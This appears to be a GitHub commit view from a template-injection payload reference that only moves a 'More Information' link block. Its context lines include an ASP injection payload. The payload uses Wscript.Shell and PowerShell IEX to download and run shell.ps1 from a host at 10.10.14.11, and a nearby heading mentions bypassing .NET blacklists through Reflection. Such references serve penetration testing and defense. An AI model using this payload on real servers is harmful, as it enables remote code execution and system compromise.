Fix wrong placement of text

This commit is contained in:
cyberzs 2025-02-22 11:33:40 +01:00 committed by GitHub
parent 6e063f6cff
commit 92e5778089

View File

@ -1020,6 +1020,10 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
**More Information**
- [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp)
### .Net Bypassing restrictions
The .NET Reflection mechanisms can be used to bypass blacklisting or classes not being present in the assembly. DLL's can be loaded at runtime with methods and properties accessible from basic objects.
@ -1039,10 +1043,6 @@ Full command execution:
- [https://efigo.pl/en/blog/cve-2024-9150/](https://efigo.pl/en/blog/cve-2024-9150/)
**More Information**
- [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp)
### Mojolicious (Perl)
Even if it's perl it uses tags like ERB in Ruby.